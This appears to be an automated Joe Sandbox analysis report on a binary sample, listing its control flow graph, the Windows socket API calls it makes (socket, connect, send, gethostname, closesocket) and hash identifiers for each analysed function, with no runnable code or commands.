                                      control_flow_graph 1808 ccaa30-ccaa64 1810 ccaa6a-ccaaa7 call cbe730 1808->1810 1811 ccab04-ccab09 1808->1811 1815 ccab0e-ccab13 1810->1815 1816 ccaaa9-ccaabd 1810->1816 1813 ccae80-ccae89 1811->1813 1819 ccae2e 1815->1819 1817 ccaabf-ccaac7 1816->1817 1818 ccab18-ccab50 1816->1818 1817->1819 1821 ccaacd-ccab02 1817->1821 1824 ccab58-ccab6d 1818->1824 1820 ccae30-ccae4a call cbea60 call cbebf0 1819->1820 1833 ccae4c-ccae57 1820->1833 1834 ccae75-ccae7d 1820->1834 1821->1824 1827 ccab6f-ccab73 1824->1827 1828 ccab96-ccabab socket 1824->1828 1827->1828 1830 ccab75-ccab8f 1827->1830 1828->1819 1832 ccabb1-ccabc5 1828->1832 1830->1832 1844 ccab91 1830->1844 1835 ccabc7-ccabca 1832->1835 1836 ccabd0-ccabed ioctlsocket 1832->1836 1838 ccae6e-ccae6f 1833->1838 1839 ccae59-ccae5e 1833->1839 1834->1813 1835->1836 1840 ccad2e-ccad39 1835->1840 1841 ccabef-ccac0a 1836->1841 1842 ccac10-ccac14 1836->1842 1838->1834 1839->1838 1847 ccae60-ccae6c 1839->1847 1845 ccad3b-ccad4c 1840->1845 1846 ccad52-ccad56 1840->1846 1841->1842 1853 ccae29 1841->1853 1848 ccac16-ccac31 1842->1848 1849 ccac37-ccac41 1842->1849 1844->1819 1845->1846 1845->1853 1852 ccad5c-ccad6b 1846->1852 1846->1853 1847->1834 1848->1849 1848->1853 1850 ccac7a-ccac7e 1849->1850 1851 ccac43-ccac46 1849->1851 1859 ccace7-ccacfe 1850->1859 1860 ccac80-ccac9b 1850->1860 1856 ccac4c-ccac51 1851->1856 1857 ccad04-ccad08 1851->1857 1861 ccad70-ccad78 1852->1861 1853->1819 1856->1857 1864 ccac57-ccac78 1856->1864 1857->1840 1863 ccad0a-ccad28 1857->1863 1859->1857 1860->1859 1865 ccac9d-ccacc1 1860->1865 1866 ccad7a-ccad7f 1861->1866 1867 ccada0-ccadb2 connect 1861->1867 1863->1840 1863->1853 1869 ccacc6-ccacd7 1864->1869 1865->1869 1866->1867 1870 ccad81-ccad99 1866->1870 1868 ccadb3-ccadcf 1867->1868 1876 ccae8a-ccae91 1868->1876 1877 ccadd5-ccadd8 1868->1877 1869->1853 1878 ccacdd-ccace5 1869->1878 1870->1868 1876->1820 1879 ccadda-ccaddf 1877->1879 1880 ccade1-ccadf1 1877->1880 1878->1857 1878->1859 1879->1861 1879->1880 1881 ccae0d-ccae12 1880->1881 1882 ccadf3-ccae07 1880->1882 1883 ccae1a-ccae1c call ccaf70 1881->1883 1884 ccae14-ccae17 1881->1884 1882->1881 1887 ccaea8-ccaead 1882->1887 1888 ccae21-ccae23 1883->1888 1884->1883 1887->1820 1889 ccae25-ccae27 1888->1889 1890 ccae93-ccae9d 1888->1890 1889->1820 1891 ccaeaf-ccaeb1 call cbe760 1890->1891 1892 ccae9f-ccaea6 call cbe7c0 1890->1892 1896 ccaeb6-ccaebe 1891->1896 1892->1896 1897 ccaf1a-ccaf1f 1896->1897 1898 ccaec0-ccaedb call cbe180 1896->1898 1897->1820 1898->1820 1901 ccaee1-ccaeec 1898->1901 1902 ccaeee-ccaeff 1901->1902 1903 ccaf02-ccaf06 1901->1903 1902->1903 1904 ccaf0e-ccaf15 1903->1904 1905 ccaf08-ccaf0b 1903->1905 1904->1813 1905->1904
                                      APIs
                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00CCAB9B
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00CCABE4
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: ioctlsocketsocket
                                      • String ID:
                                      • API String ID: 416004797-0
                                      • Opcode ID: c6e2ca29c8007de8fb3be26e7b6c46e7a428caaeb86a881909f6dfb53f8ca23a
                                      • Instruction ID: a1b0395be99bc55ae76a089071d83f1170eb71dbadbe3e2ab8f75a7b3e708b6d
                                      • Opcode Fuzzy Hash: c6e2ca29c8007de8fb3be26e7b6c46e7a428caaeb86a881909f6dfb53f8ca23a
                                      • Instruction Fuzzy Hash: A2E1D1706003069BEB20CF24C889F6B77E5EF85308F144A2CF9A98B291D775DE54DB92
                                      Function 00C078B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID: FD %s:%d sclose(%d)
                                      • API String ID: 2781271927-3116021458
                                      • Opcode ID: 57379165961f54fa960a1e4a1010363a44c6956e52d668c855851f8919b63ead
                                      • Instruction ID: 6df4c965c3cb6c298c28908b6dd4977ff40aaa4990282f4dc2acb9620cd866ef
                                      • Opcode Fuzzy Hash: 57379165961f54fa960a1e4a1010363a44c6956e52d668c855851f8919b63ead
                                      • Instruction Fuzzy Hash: 00D05B2290512177C5206599AD45C5F67A5DDC6F20B070958F45077244D2209D11C3F3
                                      Function 00CCB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00CCB29E,?,00000000,?,?), ref: 00CCB0BA
                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00CB3C41,00000000), ref: 00CCB0C1
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnect
                                      • String ID:
                                      • API String ID: 374722065-0
                                      • Opcode ID: ab37fc1c0914447ae09b7f5d24c6e858d0eddf71c2884639fbfeac2988e248d3
                                      • Instruction ID: de13381ae94391fe7c8a577bbe9bb8fcc4f4effd02f7d8a7ec3ace4d296f61cb
                                      • Opcode Fuzzy Hash: ab37fc1c0914447ae09b7f5d24c6e858d0eddf71c2884639fbfeac2988e248d3
                                      • Instruction Fuzzy Hash: 2401D4762042009BCA205AB9DC84FABB799FF89364F040B68F978931E1D726EE509752
                                      Function 00CB4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • gethostname.WS2_32(00000000,00000040), ref: 00CB4AA5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: gethostname
                                      • String ID:
                                      • API String ID: 144339138-0
                                      • Opcode ID: 97029593ca3180e4cdd97da0e6f3060650774077540c9bc7f1dc51bfab9d5a0b
                                      • Instruction ID: 46fb22e6bff6dfc1cf1f80d3d9a53eb2ab29578584bbffd45a79ef16a75b58f9
                                      • Opcode Fuzzy Hash: 97029593ca3180e4cdd97da0e6f3060650774077540c9bc7f1dc51bfab9d5a0b
                                      • Instruction Fuzzy Hash: 5451E570A08B008FEB389F29DD497A376E8EF01315F14193CEA9A866D3E775E944D702
                                      Function 00CCAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 00CCAFD1
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID:
                                      • API String ID: 3358416759-0
                                      • Opcode ID: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                      • Instruction ID: 6bca6e8e48739631b8478fcf97dd9b2e90bee1f683dc4be78b7208d069c101ae
                                      • Opcode Fuzzy Hash: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                      • Instruction Fuzzy Hash: 0C11967080878595EB268F58D406BF6B3F4EFD1329F10961CE5A942150F7725AC68BD2
                                      Function 00CCA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00CCA97E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: 8f6c20bd5ddbb80ca77bb47f6c960523bb836df6148d16f56034e4b8d2f346ab
                                      • Instruction ID: f9feae7c188eae784e698ae1025d0bd62346a25ebe3f3013582035eb9c7b1f82
                                      • Opcode Fuzzy Hash: 8f6c20bd5ddbb80ca77bb47f6c960523bb836df6148d16f56034e4b8d2f346ab
                                      • Instruction Fuzzy Hash: 4701A272B01714AFC6148F24DC86F5ABBA5EF84720F06865DEA982B361C331AC108BD1
                                      Function 00CCAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(?,00CCB280,00000000,-00000001,00000000,00CCB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00CCAF67
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID:
                                      • API String ID: 98920635-0
                                      • Opcode ID: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                      • Instruction ID: 9eba6902a4bb4ab9aca96d0f266c105838fc6d18bb70339b8fd3d9674fe8471f
                                      • Opcode Fuzzy Hash: f17d028e791bd8040e94f867168e3b55f6c28bf03ea2328056f6d14dde0ce8a7
                                      • Instruction Fuzzy Hash: 3FE06DB2A082216BC610CA48E844EABF369EFC4B20F054A0DF86463214C370EC408BE2
                                      Function 00CCB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • closesocket.WS2_32(?,00CC9422,?,?,?,?,?,?,?,?,?,?,?,00CB3377,01094C60,00000000), ref: 00CCB04D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                      • Instruction ID: 9584b2d60eedb98c75161b9b5e69fe85d0af30f38ed21c0cb18523cbcd2387c1
                                      • Opcode Fuzzy Hash: cff26fdd484b361571a05a9ea2e11151c2ec08a931a7ba85881712463a1b8fdd
                                      • Instruction Fuzzy Hash: 36D0C27430020157CA209A94C985F57B26B7FD0310FA9CB6CF03C4A554C73BCD478A01
                                      Function 00C667E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ioctlsocket.WS2_32(?,8004667E,?,?,00C3AF56,?,00000001), ref: 00C667FC
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: ioctlsocket
                                      • String ID:
                                      • API String ID: 3577187118-0
                                      • Opcode ID: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                      • Instruction ID: 138fa63837c4d5d8309e9c11fbf541c660f582e4033b569c2718004ce565f68b
                                      • Opcode Fuzzy Hash: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                      • Instruction Fuzzy Hash: BDC080F511C101BFC70C8724D855B2F7BD8DB45355F01581CB046C11C0EA309994CF1B
                                      Function 00C031D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
